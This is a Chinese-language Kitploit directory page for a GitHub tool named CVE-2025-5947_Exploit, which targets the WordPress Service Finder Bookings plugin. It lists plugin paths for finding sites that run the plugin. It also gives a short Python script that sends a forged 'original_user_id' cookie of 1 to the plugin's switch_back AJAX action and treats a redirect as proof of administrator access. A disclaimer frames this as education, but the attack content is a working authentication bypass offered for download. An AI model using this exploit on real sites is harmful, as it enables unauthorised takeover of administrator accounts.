Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-5947_Exploit — 一个针对 Service Finder -Bookings 插件 WP 的迷你漏洞利用程序 | Kitploit
工具/GitHubGitHub/m4rgs/cve-2025-5947_exploit
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

一个针对 Service Finder -Bookings 插件 WP 的迷你漏洞利用程序

查看仓库
110个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔍 WordPress 插件漏洞利用 — Service Finder (sf-booking)

概述

Service Finder 插件是 WordPress 的预订和服务管理系统。
由于其受欢迎程度和复杂性,某些版本存在与未认证的 AJAX 端点或不当访问控制相关的安全问题。

本 README 旨在说明研究人员如何安全地对安装进行指纹识别,并遵循道德规范(dbr krk)。


易受攻击的 WP 搜索语法

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


漏洞利用流程

⚠️ 免责声明:
这些搜索仅用于教育和研究目的。请不要尝试未经授权的访问或利用。

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399:✅ 存在漏洞!以管理员身份重定向到管理面板
  • 400-499:⚠️ 客户端错误 — 请求无效或未经授权,不存在漏洞

参考资料

  • WPScan 插件数据库 — https://wpscan.com/plugins/
  • 国家漏洞数据库(NVD)— https://nvd.nist.gov/
  • OWASP — Google 搜索语法 / 侦察技术
  • HackerOne 披露指南 — https://www.hackerone.com/disclosure-guidelines

作者

Taha Mounir


下载工具